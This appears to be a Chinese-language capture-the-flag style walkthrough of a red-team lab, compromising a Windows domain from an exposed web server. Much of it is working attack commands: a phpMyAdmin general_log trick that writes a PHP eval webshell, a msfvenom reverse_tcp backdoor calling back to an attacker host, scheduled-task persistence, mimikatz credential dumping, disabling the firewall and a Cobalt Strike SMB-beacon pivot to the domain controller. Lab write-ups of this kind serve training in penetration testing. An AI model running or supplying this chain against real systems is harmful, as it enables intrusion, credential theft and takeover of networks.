靶场信息
这个靶场是红日安全,红队第一个靶机, 密码:hongrisec@2019
由四台虚拟机组成win2k3/win7/win2008/kali
kali(vm8)攻击机 192.168.21.128
win7(vm2/8)对外边界服务器 192.168.52.143/192.168.21.146 开启phpstudy即可
win2k3(vm2)域成员 192.168.52.141
win2008(vm2)域靶机 192.168.52.138
信息收集
- arp-scan -l或者nmap -sU --script nbstat.nse -p137 -T4 192.168.21.128/24
- nmap -T4 -f -sS -p- 192.168.21.146
Not shown: 65523 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1030/tcp open iad1
1031/tcp open iad2
3306/tcp open mysql
5357/tcp open wsdapi
MAC Address: 00:0C:29:4F:8D:05 (VMware) - 对80/135/445/3306端口进行测试
- dirsearch -u 192.168.21.140
dirb http://192.168.21.140
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u http://192.168.21.140
目录扫描获取
[21:16:08] 200 - 2KB - /phpmyadmin/README
[21:16:09] 200 - 32KB - /phpmyadmin/ChangeLog
[21:16:10] 200 - 4KB - /phpMyAdmin/index.php
网站获取权限
phpmyadmin获权
- 登录http://192.168.21.146/phpmyadmin/默认密码root:root
- show variables like '%secure_file%'; 查看是否有任意位置读写文件权限
null 发现没权限into outfile
show variables like '%general%'; #查看日志状
SET GLOBAL general_log='on' #开启general
set global general_log_file='C:/phpstudy/www/cmd.php'; #将路径改为
SELECT "<?PHP @EVAL($_POST['zyx']);?>" #一句话木马 - 写马成功,蚁剑登录
权限维持/提升
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.21.128 lpost=4444 -f exe -o 1.exe #msf产生后门 蚁剑执行
- use exploit/multi/handler
set payload
set lhost
run监听 - 获得权限shell chcp 65001去除乱码
schtasks /create /tn solrindex "ma" /tr C:\phpstudy\www\1.exe /sc minute /mo 1(windows添加计划任务每分钟执行一次)
getsystem
ps
migrate 520 注入到一个system的进程里
run persistence -X -i 50 -p 4444 -r 192.168.21.128
内网信息收集
- load kiwi
creds_all 获取Administrator GOD hongrisec@2019 - 判断域信息
whoami #god/administrator查看当前权限
hostname #stu1显示主机名称
net user #Administrator Guest liukaifeng01查询用户列表
net localgroup administrators #Administrator;liukaifeng01获取本地管理员(通常包含域用户)信息
systeminfo #使用systeminfo查看系统详细信息
shell tasklist #查询进程列表,看看有没有杀毒软件进程进程名 软件 360sd.exe 360 杀毒 360tray.exe 360 实时保护 ZhuDongFangYu.exe 360 主动防御 KSafeTray.exe 金山卫士 SafeDogUpdateCenter.exe 安全狗 McAfee McShield.exe egui.exe NOD32 AVP.exe 卡巴斯基 avguard.exe 小红伞 bdagent.exe BitDefender ipconfig #dns为god.org域和dns一般为同一台主机
net view #查看域信息\\OWA\\ROOTTVI862UBEH\\STU1
net config workstation #查看当前登录域及登录用户信息GOD
net view /domain #查询域GOD
net view /domain:GOD #查询 GOD域内全部主机\\OWA\\ROOT-TVI862UBEH\\STU1 - cs上线
SMB Beacon有两种使用方式:- 直接派生一个孩子,目的为了进一步盗取hash
- 在已有的beacon上创建监听,用来作为跳板进行内网渗透
这里我们使用第二种方式,创建SMB监听:
- 关闭防火墙shell netsh firewall show state
shell netsh advfirewall set allprofiles state off - 之后利用cs,网络扫描,进行上图操作,获取hash,迷糊桃,获取其他机器密码
- 密码192.168.52.138,成功获得域控权限,同理获得2003权限,渗透结束
- 文章参考1.2.3.4.5.6
cs使用1.2.3